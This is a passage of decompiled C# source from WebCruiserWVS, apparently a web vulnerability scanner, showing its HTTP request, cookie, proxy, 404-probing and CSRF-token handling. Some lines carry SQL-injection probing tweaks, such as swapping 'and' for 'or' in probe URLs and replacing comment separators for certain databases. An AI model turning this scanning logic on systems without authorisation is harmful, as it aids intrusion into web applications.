using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.ComponentModel;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Web;
using System.Windows.Forms;
using System.Xml;
using Microsoft.JScript;

namespace WebCruiserWVS
{
	public class WebSite
	{
		public DelegateDisplayLog delegateLog;

		public DelegateAddVulnToWVS delegateAddVulnToWVS;

		public List<Vulnerability> allVulnList;

		public string wvsFileName = "";

		private string _URL;

		private string _HTTPRoot = "";

		private string _DomainHost = "";

		public Uri currentUri;

		private int _HTTPThreadNum;

		private DBType _DatabaseType;

		private ParameterType _paramType = ParameterType.UnKnown;

		private InjectMethod _InjMethod = InjectMethod.ToBeDetect;

		public CookieContainer cc = new CookieContainer();

		public static bool EscapeCookie = true;

		public bool SingleThreadLocked;

		public DateTime dtLastSearch = DateTime.Now;

		public DateTime LastModifiedTime = DateTime.Now;

		public DateTime LastGetTime = DateTime.Now;

		public static TaskStatus CurrentStatus = TaskStatus.Ready;

		public static bool LogScannedURL = false;

		private List<string> ScannedURL = new List<string>();

		private List<string> CrawledURL = new List<string>();

		private List<string> ScannedParameter = new List<string>();

		public static int MultiProcessNum = 0;

		public XmlDocument WcrXml;

		public string WcrFileName = "";

		public int unionFieldIndex;

		public int unionFieldsCount;

		private string KeyWord = "";

		public string FileExt = "";

		public string WebRoot = "";

		public Encoding WebEncoding = Encoding.UTF8;

		public Encoding DBEncoding = Encoding.UTF8;

		public static Random rd = new Random();

		private static ReaderWriterLock writeLock = new ReaderWriterLock();

		private List<string> urlList404 = new List<string>();

		private int osType;

		public string CurrentKeyWord
		{
			get
			{
				return KeyWord;
			}
			set
			{
				KeyWord = value;
			}
		}

		public string URL
		{
			get
			{
				return _URL;
			}
			set
			{
				_URL = value;
				InitDomain();
			}
		}

		public string HTTPRoot => _HTTPRoot;

		public string DomainHost => _DomainHost;

		public int HTTPThreadNum
		{
			get
			{
				return _HTTPThreadNum;
			}
			set
			{
				_HTTPThreadNum = value;
			}
		}

		public DBType DatabaseType
		{
			get
			{
				return _DatabaseType;
			}
			set
			{
				_DatabaseType = value;
			}
		}

		public ParameterType paramType
		{
			get
			{
				return _paramType;
			}
			set
			{
				_paramType = value;
			}
		}

		public InjectMethod injectMethod
		{
			get
			{
				return _InjMethod;
			}
			set
			{
				_InjMethod = value;
			}
		}

		public void AddScannedURL(string sURL)
		{
			ScannedURL.Add(sURL);
		}

		public void AddCrawledURL(string sURL)
		{
			CrawledURL.Add(sURL);
		}

		public void AddScannedParameter(string sURL)
		{
			ScannedParameter.Add(sURL);
		}

		public void ClearWVS()
		{
			ScannedURL.Clear();
			CrawledURL.Clear();
			ScannedParameter.Clear();
		}

		public string Save(bool IsSaveAs)
		{
			//IL_0026: Unknown result type (might be due to invalid IL or missing references)
			//IL_002c: Expected O, but got Unknown
			//IL_004a: Unknown result type (might be due to invalid IL or missing references)
			//IL_004f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0050: Unknown result type (might be due to invalid IL or missing references)
			//IL_0052: Invalid comparison between Unknown and I4
			if (string.IsNullOrEmpty(WcrFileName) || IsSaveAs)
			{
				string fileName = "WebCruiserWVS_" + DomainHost + ".xml";
				SaveFileDialog val = new SaveFileDialog();
				((FileDialog)val).set_Filter("XML File(*.xml) | *.xml");
				((FileDialog)val).set_InitialDirectory(Application.get_StartupPath());
				((FileDialog)val).set_FileName(fileName);
				DialogResult val2 = ((CommonDialog)val).ShowDialog();
				if ((int)val2 != 1)
				{
					return "";
				}
				WcrFileName = ((FileDialog)val).get_FileName();
				((Component)val).Dispose();
			}
			WcrXml.Save(WcrFileName);
			return WcrFileName;
		}

		private void InitDomain()
		{
			//IL_00ae: Unknown result type (might be due to invalid IL or missing references)
			//IL_00b8: Expected O, but got Unknown
			//IL_00eb: Unknown result type (might be due to invalid IL or missing references)
			if (string.IsNullOrEmpty(_URL))
			{
				return;
			}
			try
			{
				if (_URL.IndexOf("about:blank") != 0)
				{
					if (_URL.IndexOf("http") < 0)
					{
						_URL = "http://" + _URL.Trim();
					}
					if (_URL.LastIndexOf('/') < 9)
					{
						_URL = _URL.Trim() + "/";
					}
					_HTTPRoot = _URL.Substring(0, _URL.IndexOf("/", 9) + 1);
					currentUri = new Uri(_URL);
					_DomainHost = currentUri.get_Host();
					FileExt = GetFileExt(_URL);
					osType = 0;
				}
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message);
			}
		}

		public WebSite(string sURL)
		{
			//IL_0030: Unknown result type (might be due to invalid IL or missing references)
			//IL_003a: Expected O, but got Unknown
			ServicePointManager.set_Expect100Continue(false);
			ServicePointManager.set_DefaultConnectionLimit(1024);
			ServicePointManager.set_SecurityProtocol((SecurityProtocolType)4080);
			_URL = sURL;
			InitDomain();
			allVulnList = new List<Vulnerability>();
			InitWCRXML();
		}

		public static string GenerateRandomIntegerString()
		{
			return rd.Next(1000000, 10000000).ToString();
		}

		public string GetFileExt(string sURL)
		{
			try
			{
				string text = "";
				text = ((!Regex.IsMatch(sURL, "[\\?\\^]")) ? Path.GetExtension(sURL) : ((Capture)Regex.Match(sURL, "\\.\\w+(?=[\\?\\^])")).get_Value());
				return text.ToLower();
			}
			catch
			{
				return "";
			}
		}

		private void InitWCRXML()
		{
			//IL_0001: Unknown result type (might be due to invalid IL or missing references)
			//IL_000b: Expected O, but got Unknown
			WcrXml = new XmlDocument();
			XmlNode val = (XmlNode)(object)WcrXml.CreateXmlDeclaration("1.0", "utf-8", "");
			((XmlNode)WcrXml).AppendChild(val);
			XmlComment val2 = WcrXml.CreateComment("Created By WebCruiser - Web Vulnerability Scanner http://www.janusec.com");
			((XmlNode)WcrXml).AppendChild((XmlNode)(object)val2);
			XmlElement val3 = WcrXml.CreateElement("ROOT");
			((XmlNode)WcrXml).AppendChild((XmlNode)(object)val3);
			XmlElement val4 = WcrXml.CreateElement("CurrentSite");
			((XmlNode)val3).AppendChild((XmlNode)(object)val4);
			XmlElement val5 = WcrXml.CreateElement("SiteVulList");
			((XmlNode)val3).AppendChild((XmlNode)(object)val5);
			XmlElement val6 = WcrXml.CreateElement("SiteDirTree");
			((XmlNode)val3).AppendChild((XmlNode)(object)val6);
			XmlElement val7 = WcrXml.CreateElement("SiteSQLEnv");
			((XmlNode)val3).AppendChild((XmlNode)(object)val7);
			XmlElement val8 = WcrXml.CreateElement("SiteDBStructure");
			((XmlNode)val3).AppendChild((XmlNode)(object)val8);
		}

		public static void DebugLog(string logStr)
		{
			try
			{
				DateTime now = DateTime.Now;
				string path = Application.get_StartupPath() + "\\WebCruiser" + now.ToString("yyyyMMdd") + ".log";
				string s = now.ToString("yyyy-MM-dd HH:mm:ss") + "  " + logStr.Replace("%20", " ") + "\r\n";
				byte[] bytes = Encoding.Default.GetBytes(s);
				writeLock.AcquireWriterLock(-1);
				FileStream fileStream = new FileStream(path, FileMode.Append, FileAccess.Write, FileShare.ReadWrite, 8, FileOptions.WriteThrough);
				fileStream.Write(bytes, 0, bytes.Length);
				fileStream.Close();
				fileStream.Dispose();
			}
			catch (Exception)
			{
			}
			finally
			{
				writeLock.ReleaseWriterLock();
			}
		}

		[DllImport("wininet.dll", CharSet = CharSet.Auto, SetLastError = true)]
		public static extern bool InternetSetCookieEx(string url, string cookieName, StringBuilder cookieData, int dwFlags, IntPtr lpReserved);

		public void SetCookie(string sUrl, string CookieStr, bool isClear)
		{
			//IL_0020: Unknown result type (might be due to invalid IL or missing references)
			//IL_0026: Expected O, but got Unknown
			//IL_0047: Unknown result type (might be due to invalid IL or missing references)
			//IL_004d: Expected O, but got Unknown
			//IL_00e3: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				if (string.IsNullOrEmpty(CookieStr) || string.IsNullOrEmpty(_HTTPRoot))
				{
					return;
				}
				Uri val = new Uri(sUrl);
				if (isClear)
				{
					CookieCollection cookies = cc.GetCookies(val);
					foreach (Cookie item in cookies)
					{
						Cookie val2 = item;
						val2.set_Expires(DateTime.Now.AddYears(-1));
					}
					return;
				}
				val.get_AbsolutePath();
				string[] array = CookieStr.Split(new char[1]
				{
					';'
				});
				string[] array2 = array;
				foreach (string text in array2)
				{
					SetSingleCookie(sUrl, text.Trim(), "", EscapeCookie, isClear);
				}
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message);
			}
		}

		public void SetSingleCookie(string sUrl, string cookieExpression, string cookiePath, bool escapeCookie, bool isExpired)
		{
			//IL_000a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0010: Expected O, but got Unknown
			//IL_00d5: Unknown result type (might be due to invalid IL or missing references)
			//IL_00dc: Expected O, but got Unknown
			//IL_015d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0164: Expected O, but got Unknown
			//IL_01f6: Unknown result type (might be due to invalid IL or missing references)
			//IL_01fd: Expected O, but got Unknown
			//IL_0267: Unknown result type (might be due to invalid IL or missing references)
			//IL_026e: Expected O, but got Unknown
			if (string.IsNullOrEmpty(cookieExpression))
			{
				return;
			}
			try
			{
				Uri val = new Uri(sUrl);
				string[] array = cookieExpression.Split(new char[1]
				{
					'='
				});
				string text = array[0].Trim();
				string text2 = "";
				for (int i = 1; i < array.Length; i++)
				{
					text2 = ((!string.IsNullOrEmpty(text2)) ? (text2 + "=" + array[i]) : (text2 + array[i]));
				}
				if (!string.IsNullOrEmpty(text2))
				{
					text2 = text2.Trim();
					text2 = GlobalObject.unescape((object)text2);
					if (escapeCookie)
					{
						text2 = GlobalObject.escape((object)text2);
					}
					else if (text2.IndexOf("\"") != 0)
					{
						text2 = text2.Replace("\"", "'");
						if (text2.IndexOf('\'') > 0 || text2.IndexOf(' ') > 0)
						{
							text2 = "\"" + text2 + "\"";
						}
					}
				}
				CookieCollection val2 = new CookieCollection();
				try
				{
					val2 = cc.GetCookies(val);
				}
				catch
				{
				}
				if (string.IsNullOrEmpty(cookiePath))
				{
					cookiePath = val.get_AbsolutePath();
				}
				string text3 = text + "=" + text2 + ";path=" + cookiePath + ";domain=" + DomainHost;
				if (isExpired)
				{
					foreach (Cookie item in val2)
					{
						Cookie val3 = item;
						if (val3.get_Name().Equals(text) && val3.get_Path().Equals(cookiePath))
						{
							val3.set_Expires(DateTime.Now.AddYears(-1));
						}
					}
					string value = text3 + ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
					InternetSetCookieEx(sUrl, null, new StringBuilder(value), 8192, IntPtr.Zero);
					return;
				}
				foreach (Cookie item2 in val2)
				{
					Cookie val4 = item2;
					if (val4.get_Name().Equals(text) && val4.get_Path().Equals(cookiePath))
					{
						val4.set_Value(text2);
						InternetSetCookieEx(sUrl, null, new StringBuilder(text3), 8192, IntPtr.Zero);
						return;
					}
				}
				Cookie val5 = new Cookie(text, text2, cookiePath, DomainHost);
				cc.Add(val5);
				InternetSetCookieEx(sUrl, null, new StringBuilder(text3), 8192, IntPtr.Zero);
			}
			catch (Exception)
			{
			}
		}

		public static string[] GetParaNameValue(string Expression, char SplitChar)
		{
			string[] array = Expression.Split(new char[1]
			{
				SplitChar
			});
			string[] array2 = new string[2]
			{
				array[0],
				null
			};
			string text = "";
			for (int i = 1; i < array.Length; i++)
			{
				if (!string.IsNullOrEmpty(text))
				{
					text += SplitChar;
				}
				text += array[i];
			}
			array2[1] = text;
			return array2;
		}

		public HttpWebResponse GetHttpWebResponse(string sURL, RequestType ReqType, string urlencodedPostData, string enctype, string customCookie, bool escapeCookie, string customUserAgent, string customReferer)
		{
			//IL_01e0: Unknown result type (might be due to invalid IL or missing references)
			//IL_01e7: Expected O, but got Unknown
			//IL_0237: Unknown result type (might be due to invalid IL or missing references)
			//IL_023e: Expected O, but got Unknown
			//IL_0256: Unknown result type (might be due to invalid IL or missing references)
			//IL_0260: Expected O, but got Unknown
			//IL_035e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0365: Expected O, but got Unknown
			//IL_037d: Unknown result type (might be due to invalid IL or missing references)
			//IL_039d: Expected O, but got Unknown
			//IL_03b2: Unknown result type (might be due to invalid IL or missing references)
			if (CurrentStatus == TaskStatus.Stop)
			{
				return null;
			}
			while (_HTTPThreadNum >= WCRSetting.MaxHTTPThreadNum)
			{
				Thread.Sleep(300);
			}
			if (CurrentStatus == TaskStatus.Stop)
			{
				return null;
			}
			_HTTPThreadNum++;
			DateTime now = DateTime.Now;
			string str = ReqType.ToString() + "  " + sURL + "  " + urlencodedPostData + " " + customCookie + " ";
			sURL = sURL.Replace(" ", "%20");
			if (sURL.IndexOf("99999999") > 0 && sURL.IndexOf("%20and%20(", StringComparison.OrdinalIgnoreCase) > 0)
			{
				sURL = sURL.Replace("%20and%20(", "%20or%20(").Replace("%20aNd%20(", "%20oR%20(");
			}
			if (WCRSetting.chkReplace1)
			{
				sURL = sURL.Replace(WCRSetting.FiltExpr1, WCRSetting.RepExpr1);
			}
			if (WCRSetting.chkReplace2)
			{
				sURL = sURL.Replace(WCRSetting.FiltExpr2, WCRSetting.RepExpr2);
			}
			if (WCRSetting.chkReplace3)
			{
				sURL = sURL.Replace(WCRSetting.FiltExpr3, WCRSetting.RepExpr3);
			}
			if (_DatabaseType == DBType.DB2 || _DatabaseType == DBType.Access)
			{
				sURL = sURL.Replace("/**/", "%20");
			}
			if (WCRSetting.UseSingleThread)
			{
				while (SingleThreadLocked)
				{
					Thread.Sleep(300);
				}
				SingleThreadLocked = true;
				TimeSpan timeSpan = DateTime.Now.Subtract(dtLastSearch);
				int num = WCRSetting.SecondsDelay * 1000;
				if (timeSpan.Milliseconds < num)
				{
					Thread.Sleep(num - timeSpan.Milliseconds);
				}
				dtLastSearch = DateTime.Now;
			}
			string text = "";
			if (ReqType == RequestType.COOKIE)
			{
				SetSingleCookie(URL2NoParaURL(sURL), customCookie, "", escapeCookie, isExpired: false);
			}
			HttpWebRequest val = (HttpWebRequest)WebRequest.Create(sURL);
			try
			{
				if (string.IsNullOrEmpty(customUserAgent))
				{
					val.set_UserAgent(WCRSetting.UserAgent);
				}
				else
				{
					val.set_UserAgent(customUserAgent);
				}
				if (!string.IsNullOrEmpty(customReferer))
				{
					val.set_Referer(customReferer);
				}
				val.set_CookieContainer(cc);
				if (WCRSetting.UseProxy)
				{
					WebProxy val2 = new WebProxy(WCRSetting.ProxyAddress, WCRSetting.ProxyPort);
					if (!string.IsNullOrEmpty(WCRSetting.ProxyUsername))
					{
						val2.set_Credentials((ICredentials)new NetworkCredential(WCRSetting.ProxyUsername, WCRSetting.ProxyPassword));
					}
					else
					{
						val2.set_Credentials(CredentialCache.get_DefaultCredentials());
					}
					((WebRequest)val).set_Proxy((IWebProxy)(object)val2);
					val.set_UnsafeAuthenticatedConnectionSharing(true);
				}
				if (ReqType == RequestType.POST)
				{
					((WebRequest)val).set_Method("POST");
					if (enctype.Equals("multipart/form-data"))
					{
						((WebRequest)val).set_ContentType("multipart/form-data; boundary=----WebFormBoundary0x5743525F575653");
					}
					else if (enctype.Equals("text/plain"))
					{
						((WebRequest)val).set_ContentType("text/plain");
					}
					else
					{
						((WebRequest)val).set_ContentType("application/x-www-form-urlencoded");
					}
					text = ConvertPostDataByContentType(urlencodedPostData, enctype);
					byte[] bytes = Encoding.UTF8.GetBytes(text);
					Stream requestStream = ((WebRequest)val).GetRequestStream();
					requestStream.Write(bytes, 0, bytes.Length);
					requestStream.Close();
				}
				else
				{
					((WebRequest)val).set_Method("GET");
				}
				val.set_Accept("*/*");
				((WebRequest)val).set_Timeout(30000);
				while (CurrentStatus == TaskStatus.Pause)
				{
					Thread.Sleep(1000);
				}
				if (CurrentStatus == TaskStatus.Stop)
				{
					return null;
				}
				HttpWebResponse val3 = (HttpWebResponse)((WebRequest)val).GetResponse();
				val3.get_CharacterSet();
				LastModifiedTime = val3.get_LastModified();
				str += ((object)val3.get_StatusCode()).ToString();
				return val3;
			}
			catch (WebException val4)
			{
				WebException val5 = val4;
				WebResponse response = val5.get_Response();
				HttpWebResponse val6 = response as HttpWebResponse;
				if (val6 != null)
				{
					str += ((object)val6.get_StatusCode()).ToString();
				}
				return val6;
			}
			catch (Exception ex)
			{
				if (LogScannedURL)
				{
					DebugLog(ReqType.ToString() + "  " + sURL + "  Exception:" + ex.Message);
				}
				return null;
			}
			finally
			{
				val = null;
				SingleThreadLocked = false;
				_HTTPThreadNum--;
				if (_HTTPThreadNum < 0)
				{
					_HTTPThreadNum = 0;
				}
				if (!string.IsNullOrEmpty(customUserAgent))
				{
					str = str + " User-Agent: " + customUserAgent;
				}
				if (!string.IsNullOrEmpty(customReferer))
				{
					str = str + " Referer: " + customReferer;
				}
				LastGetTime = DateTime.Now;
				str = str + "  " + LastGetTime.Subtract(now).TotalMilliseconds + "ms";
				if (LogScannedURL)
				{
					DebugLog(str);
				}
			}
		}

		public static string ConvertToFormUrlencoded(string postData)
		{
			//IL_0027: Unknown result type (might be due to invalid IL or missing references)
			//IL_002d: Expected O, but got Unknown
			//IL_004c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0052: Expected O, but got Unknown
			if (postData.StartsWith("--") && postData.IndexOf("Content-Disposition: form-data; name=") > 0)
			{
				Regex val = new Regex("^Content-Disposition:\\sform-data;\\sname=\\x22[\\s\\S]+?(?=\\r\\n--)", (RegexOptions)2);
				MatchCollection val2 = val.Matches(postData);
				string text = "";
				{
					foreach (Match item in val2)
					{
						Match val3 = item;
						if (!string.IsNullOrEmpty(text))
						{
							text += "&";
						}
						string value = ((Capture)val3).get_Value();
						string value2 = ((Capture)Regex.Match(value, "(?<=name=\\x22)\\w+(?=\\x22)", (RegexOptions)16)).get_Value();
						int num = value.IndexOf("\r\n\r\n");
						string str = value.Substring(num + 4);
						text = text + value2 + "=" + str;
					}
					return text;
				}
			}
			return postData;
		}

		public string ConvertPostDataByContentType(string postData, string enctype)
		{
			string[] array = postData.Split(new char[1]
			{
				'&'
			});
			if (enctype.Equals("multipart/form-data"))
			{
				string str = "----WebFormBoundary0x5743525F575653";
				string str2 = "";
				string[] array2 = array;
				foreach (string text in array2)
				{
					string text2 = "";
					string arg = "";
					int num = text.IndexOf('=');
					if (num < 0)
					{
						text2 = text;
					}
					else
					{
						text2 = text.Substring(0, num);
						arg = text.Substring(num + 1);
						arg = HttpUtility.UrlDecode(arg);
					}
					str2 = str2 + "--" + str + "\r\n";
					str2 += $"Content-Disposition: form-data; name=\"{text2}\"\r\n\r\n{arg}\r\n";
				}
				return str2 + "--" + str + "--\r\n";
			}
			if (enctype.Equals("text/plain"))
			{
				string text3 = "";
				string[] array3 = array;
				foreach (string text4 in array3)
				{
					string text5 = "";
					string str3 = "";
					int num2 = text4.IndexOf('=');
					if (num2 < 0)
					{
						text5 = text4;
					}
					else
					{
						text5 = text4.Substring(0, num2);
						str3 = text4.Substring(num2 + 1);
						str3 = HttpUtility.UrlDecode(str3, WebEncoding).Replace(" ", "+");
					}
					if (!string.IsNullOrEmpty(text3))
					{
						text3 += "&";
					}
					text3 = text3 + text5 + "=" + str3;
				}
				return text3;
			}
			string text6 = "";
			string[] array4 = array;
			foreach (string text7 in array4)
			{
				string text8 = "";
				string str4 = "";
				int num3 = text7.IndexOf('=');
				if (num3 < 0)
				{
					text8 = text7;
				}
				else
				{
					text8 = text7.Substring(0, num3);
					str4 = text7.Substring(num3 + 1);
					str4 = HttpUtility.UrlDecode(str4, WebEncoding);
					str4 = HttpUtility.UrlEncode(str4, WebEncoding).Replace("'", "%27");
				}
				if (!string.IsNullOrEmpty(text6))
				{
					text6 += "&";
				}
				text6 = text6 + text8 + "=" + str4;
			}
			return text6;
		}

		public bool Is404URL(string sURL, string callerFunctionName)
		{
			//IL_0005: Unknown result type (might be due to invalid IL or missing references)
			//IL_003e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0044: Expected O, but got Unknown
			//IL_007a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0081: Expected O, but got Unknown
			//IL_0099: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a3: Expected O, but got Unknown
			//IL_00dc: Unknown result type (might be due to invalid IL or missing references)
			//IL_00e3: Expected O, but got Unknown
			//IL_00e5: Unknown result type (might be due to invalid IL or missing references)
			//IL_00ea: Unknown result type (might be due to invalid IL or missing references)
			//IL_00ff: Expected O, but got Unknown
			//IL_011b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0120: Unknown result type (might be due to invalid IL or missing references)
			//IL_012b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0131: Invalid comparison between Unknown and I4
			//IL_01a3: Unknown result type (might be due to invalid IL or missing references)
			HttpStatusCode val = (HttpStatusCode)200;
			string text = URL2NoParaURL(sURL);
			bool flag = false;
			if (urlList404.Contains(text))
			{
				flag = true;
				return true;
			}
			while (_HTTPThreadNum >= WCRSetting.MaxHTTPThreadNum)
			{
				Thread.Sleep(300);
			}
			HttpWebRequest val2 = (HttpWebRequest)WebRequest.Create(text);
			try
			{
				_HTTPThreadNum++;
				val2.set_UserAgent(WCRSetting.UserAgent);
				val2.set_CookieContainer(cc);
				if (WCRSetting.UseProxy)
				{
					WebProxy val3 = new WebProxy(WCRSetting.ProxyAddress, WCRSetting.ProxyPort);
					if (!string.IsNullOrEmpty(WCRSetting.ProxyUsername))
					{
						val3.set_Credentials((ICredentials)new NetworkCredential(WCRSetting.ProxyUsername, WCRSetting.ProxyPassword));
					}
					else
					{
						val3.set_Credentials(CredentialCache.get_DefaultCredentials());
					}
					((WebRequest)val2).set_Proxy((IWebProxy)(object)val3);
					val2.set_UnsafeAuthenticatedConnectionSharing(true);
				}
				((WebRequest)val2).set_Method("HEAD");
				((WebRequest)val2).set_Timeout(30000);
				HttpWebResponse val4 = (HttpWebResponse)((WebRequest)val2).GetResponse();
				val = val4.get_StatusCode();
				((WebResponse)val4).Close();
				val4 = null;
				return false;
			}
			catch (WebException val5)
			{
				WebException val6 = val5;
				WebResponse response = val6.get_Response();
				HttpWebResponse val7 = response as HttpWebResponse;
				if (val7 == null)
				{
					return false;
				}
				val = val7.get_StatusCode();
				((WebResponse)val7).Close();
				val7 = null;
				if ((int)val == 404)
				{
					urlList404.Add(text);
					return true;
				}
				return false;
			}
			catch (Exception ex)
			{
				if (LogScannedURL)
				{
					DebugLog("HEAD  " + sURL + "  Exception:" + ex.Message);
				}
				return false;
			}
			finally
			{
				LastGetTime = DateTime.Now;
				_HTTPThreadNum--;
				val2 = null;
				if (LogScannedURL && !flag)
				{
					DebugLog("HEAD  " + sURL + "  " + ((object)val).ToString());
				}
			}
		}

		public bool IsExistedResource(string sURL)
		{
			//IL_0005: Unknown result type (might be due to invalid IL or missing references)
			//IL_0025: Unknown result type (might be due to invalid IL or missing references)
			//IL_002b: Expected O, but got Unknown
			//IL_0061: Unknown result type (might be due to invalid IL or missing references)
			//IL_0067: Expected O, but got Unknown
			//IL_007e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0088: Expected O, but got Unknown
			//IL_00bf: Unknown result type (might be due to invalid IL or missing references)
			//IL_00c5: Expected O, but got Unknown
			//IL_00c6: Unknown result type (might be due to invalid IL or missing references)
			//IL_00cb: Unknown result type (might be due to invalid IL or missing references)
			//IL_00cc: Unknown result type (might be due to invalid IL or missing references)
			//IL_00d2: Invalid comparison between Unknown and I4
			//IL_0137: Expected O, but got Unknown
			//IL_0147: Unknown result type (might be due to invalid IL or missing references)
			//IL_014c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0157: Unknown result type (might be due to invalid IL or missing references)
			//IL_015d: Invalid comparison between Unknown and I4
			//IL_019c: Unknown result type (might be due to invalid IL or missing references)
			HttpStatusCode val = (HttpStatusCode)200;
			while (_HTTPThreadNum >= WCRSetting.MaxHTTPThreadNum)
			{
				Thread.Sleep(300);
			}
			HttpWebRequest val2 = (HttpWebRequest)WebRequest.Create(sURL);
			try
			{
				_HTTPThreadNum++;
				val2.set_UserAgent(WCRSetting.UserAgent);
				val2.set_CookieContainer(cc);
				if (WCRSetting.UseProxy)
				{
					WebProxy val3 = new WebProxy(WCRSetting.ProxyAddress, WCRSetting.ProxyPort);
					if (!string.IsNullOrEmpty(WCRSetting.ProxyUsername))
					{
						val3.set_Credentials((ICredentials)new NetworkCredential(WCRSetting.ProxyUsername, WCRSetting.ProxyPassword));
					}
					else
					{
						val3.set_Credentials(CredentialCache.get_DefaultCredentials());
					}
					((WebRequest)val2).set_Proxy((IWebProxy)(object)val3);
					val2.set_UnsafeAuthenticatedConnectionSharing(true);
				}
				((WebRequest)val2).set_Method("HEAD");
				((WebRequest)val2).set_Timeout(30000);
				HttpWebResponse val4 = (HttpWebResponse)((WebRequest)val2).GetResponse();
				val = val4.get_StatusCode();
				if ((int)val == 404)
				{
					return false;
				}
				string[] values = ((NameValueCollection)((WebResponse)val4).get_Headers()).GetValues("Last-Modified");
				if (values != null)
				{
					((WebResponse)val4).Close();
					val4 = null;
					return true;
				}
				string[] values2 = ((NameValueCollection)((WebResponse)val4).get_Headers()).GetValues("Content-Type");
				if (values2 == null)
				{
					((WebResponse)val4).Close();
					val4 = null;
					return false;
				}
				((WebResponse)val4).Close();
				val4 = null;
				return true;
			}
			catch (WebException val5)
			{
				WebException val6 = val5;
				WebResponse response = val6.get_Response();
				HttpWebResponse val7 = response as HttpWebResponse;
				val = val7.get_StatusCode();
				((WebResponse)val7).Close();
				val7 = null;
				if ((int)val == 404)
				{
					return false;
				}
				return true;
			}
			catch (Exception)
			{
				return true;
			}
			finally
			{
				LastGetTime = DateTime.Now;
				_HTTPThreadNum--;
				val2 = null;
				if (LogScannedURL)
				{
					DebugLog("HEAD  " + sURL + " " + ((object)val).ToString());
				}
			}
		}

		public MemoryStream getMemStreamByStream(Stream input)
		{
			byte[] array = new byte[4096];
			MemoryStream memoryStream = new MemoryStream();
			int count;
			while ((count = input.Read(array, 0, array.Length)) > 0)
			{
				memoryStream.Write(array, 0, count);
			}
			return memoryStream;
		}

		public string GetSourceCodeFromHttpWebResponse(HttpWebResponse HttpResp)
		{
			//IL_0092: Unknown result type (might be due to invalid IL or missing references)
			//IL_0099: Expected O, but got Unknown
			if (HttpResp == null)
			{
				return "";
			}
			if (CurrentStatus == TaskStatus.Stop)
			{
				return "";
			}
			string text = "";
			try
			{
				Stream responseStream = ((WebResponse)HttpResp).GetResponseStream();
				MemoryStream memStreamByStream = getMemStreamByStream(responseStream);
				string text2 = HttpResp.get_CharacterSet();
				if (string.IsNullOrEmpty(text2))
				{
					text2 = "ISO-8859-1";
				}
				if (((WebResponse)HttpResp).get_ContentType().IndexOf("application") >= 0)
				{
					text2 = "utf-8";
				}
				responseStream.Close();
				memStreamByStream.Position = 0L;
				StreamReader streamReader = new StreamReader(memStreamByStream, Encoding.GetEncoding(text2));
				text = streamReader.ReadToEnd();
				if (text2.Equals("ISO-8859-1", StringComparison.OrdinalIgnoreCase))
				{
					Regex val = new Regex("(?<=[\\s;]charset=[\\x22\\x27]?)[\\w-]+(?=[\\x22\\x27\\s/])", (RegexOptions)1);
					text2 = ((Capture)val.Match(text)).get_Value();
					if (!string.IsNullOrEmpty(text2))
					{
						memStreamByStream.Position = 0L;
						StreamReader streamReader2 = new StreamReader(memStreamByStream, Encoding.GetEncoding(text2));
						text = streamReader2.ReadToEnd();
						streamReader2.Close();
					}
				}
				streamReader.Close();
				memStreamByStream.Close();
				((WebResponse)HttpResp).Close();
				return text;
			}
			catch (Exception)
			{
				return text;
			}
		}

		public string GetSourceCodeByReplaceCsrfCode(string sUrl, RequestType reqType, bool isDetectCsrf, WebForm webForm)
		{
			if (webForm != null)
			{
				if (isDetectCsrf)
				{
					string text = "(?<=[\\?\\^&])[^&]*(" + WCRSetting.CSRFKeywords + ")[^&]*";
					if (Regex.IsMatch(sUrl, text, (RegexOptions)1))
					{
						WebForm webForm2 = ReGetCsrfForm(webForm);
						string value = ((Capture)Regex.Match(webForm2.formInstance, text, (RegexOptions)1)).get_Value();
						string uRL = Regex.Replace(sUrl, text, value, (RegexOptions)1);
						return GetSourceCode(uRL, reqType, webForm.enctype);
					}
				}
				return GetSourceCode(sUrl, reqType, webForm.enctype);
			}
			return GetSourceCode(sUrl, reqType, "");
		}

		public string GetSourceCodeWithCsrfField(string sUrl, RequestType reqType, string csrfFieldName, WebForm webForm)
		{
			if (webForm != null)
			{
				if (!string.IsNullOrEmpty(csrfFieldName))
				{
					string text = "(?<=[\\?\\^&])[^&]*(" + csrfFieldName + ")[^&]*";
					WebForm webForm2 = ReGetCsrfForm(webForm);
					string value = ((Capture)Regex.Match(webForm2.formInstance, text, (RegexOptions)1)).get_Value();
					string uRL = Regex.Replace(sUrl, text, value, (RegexOptions)1);
					return GetSourceCode(uRL, reqType, webForm.enctype);
				}
				return GetSourceCode(sUrl, reqType, webForm.enctype);
			}
			return GetSourceCode(sUrl, reqType, "");
		}

		public string GetSourceCodeAndResponseUrlByReplaceCsrfCode(string sUrl, RequestType reqType, bool isDetectCsrf, WebForm webForm, out string responseUrl)
		{
			string text = sUrl;
			try
			{
				if (isDetectCsrf && webForm != null)
				{
					string text2 = "(?<=[\\?\\^&])[^&]*(" + WCRSetting.CSRFKeywords + ")[^&]*";
					if (Regex.IsMatch(sUrl, text2, (RegexOptions)1))
					{
						WebForm webForm2 = ReGetCsrfForm(webForm);
						string value = ((Capture)Regex.Match(webForm2.formInstance, text2, (RegexOptions)1)).get_Value();
						text = Regex.Replace(sUrl, text2, value, (RegexOptions)1);
					}
				}
				string urlencodedPostData = "";
				string customCookie = "";
				if (reqType != 0)
				{
					int num = text.IndexOf('^');
					if (num > 0)
					{
						string text3 = text.Substring(num + 1);
						switch (reqType)
						{
						case RequestType.POST:
							urlencodedPostData = text3;
							break;
						case RequestType.COOKIE:
							customCookie = text3;
							break;
						}
						text = text.Substring(0, num);
					}
				}
				string enctype = "";
				if (webForm != null)
				{
